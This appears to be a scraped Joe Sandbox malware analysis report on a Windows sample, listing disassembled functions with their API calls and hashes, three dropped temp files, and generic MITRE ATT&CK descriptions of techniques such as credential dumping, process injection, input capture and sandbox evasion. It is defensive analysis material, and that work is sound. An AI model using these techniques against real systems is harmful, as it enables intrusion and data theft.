Instruction Fuzzy Hash: B5E0D87124431836E25137547C03FD97A858F05B21F10042EFB58654D38AD6689047ED

Function 006C0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006BF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006C0D71,?,?,?,006A100A), ref: 006BF7CE

IsDebuggerPresent.KERNEL32(?,?,?,006A100A), ref: 006C0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006A100A), ref: 006C0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006C0D7F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 61ea630513973bc695a938c57b4741989a33917d0fe915728c8d3f44468dbf3f
Instruction ID: 8482a736767f329aea34eb69809c8853b1534e69e03d4064a3589a53ac118fc4
Opcode Fuzzy Hash: 61ea630513973bc695a938c57b4741989a33917d0fe915728c8d3f44468dbf3f
Instruction Fuzzy Hash: 05E06DB02003118BF3609FB8E8047527BE1FF00B81F00897DE886C6662DBB9F4848B91

Function 006BE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006BE3D5

Strings

0%w, xrefs: 006BE3B5
8%w, xrefs: 006BE3CA

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%w$8%w
API String ID: 1385522511-170289743
Opcode ID: deaaf342442e618434945774ce0856d6156ca2e5cad19b217696c0e80c35b117
Instruction ID: 07d72b40bd8fbb58b776ce04002d56d0c0df6be5624bb51b0cedc66a8bb86c4d
Opcode Fuzzy Hash: deaaf342442e618434945774ce0856d6156ca2e5cad19b217696c0e80c35b117
Instruction Fuzzy Hash: 67E02671448910CBCA049728B854ED83397EB04368B1091FCE12A872D3DB3D68C3874C

Function 006FD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006FD220

Strings

%.3d, xrefs: 006FD22B
X64, xrefs: 006FD2A8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: a8048da66445e3dc6ea9895ddcb8617a5dc981f9568c7ab8f5c191ece59beab1
Instruction ID: 5c94e97133705ebf4bc5e1842d1244b6981e0bca1c51310a0bb406a335778089
Opcode Fuzzy Hash: a8048da66445e3dc6ea9895ddcb8617a5dc981f9568c7ab8f5c191ece59beab1
Instruction Fuzzy Hash: BBD012E180810CE9CB9097D0CC458FAB37FBB08341F508452FB06A1040E628E64AA7A1

Function 00732356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0073236C
PostMessageW.USER32(00000000), ref: 00732373

Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3

Strings

Shell_TrayWnd, xrefs: 00732365

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 746ddf131aa25be72839255e1b0a06a3ddbe5bfe4739ad03c0842e17e1ae8aeb
Instruction ID: 4ddda38d093197e64ff5760f1bef0da616df767a44edbbda5a617e4f73a86b3c
Opcode Fuzzy Hash: 746ddf131aa25be72839255e1b0a06a3ddbe5bfe4739ad03c0842e17e1ae8aeb
Instruction Fuzzy Hash: 25D0C972391310BAF665A770DC0FFC676549B05B11F508A567646BA1D0C9A8B8018B58

Function 00732322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0073232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0073233F

Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3

Strings

Shell_TrayWnd, xrefs: 00732325

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 151dc7b74be48d65e009223d57b87ff2a8aa16a940d69d3d4273694e28c22c39
Instruction ID: 7c7511f28386dba0504acf84e60c52a219e631ad6035ec6a4aaee489897cec00
Opcode Fuzzy Hash: 151dc7b74be48d65e009223d57b87ff2a8aa16a940d69d3d4273694e28c22c39
Instruction Fuzzy Hash: 62D0C976394310F6E664A770DC0FFC67A549B00B11F108A567646BA1D0C9A8A8018B58

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cNDddMAF5u.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Graff

C:\Users\user\AppData\Local\Temp\a155F05G

C:\Users\user\AppData\Local\Temp\aut54A3.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
cNDddMAF5u.exe

Function 006A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 006A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 006E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 006A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 006E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 006A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 006A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 006A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 016D5468 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 006A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 016D5268 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
fileCOMMON

Function 00712947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Function 006D5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre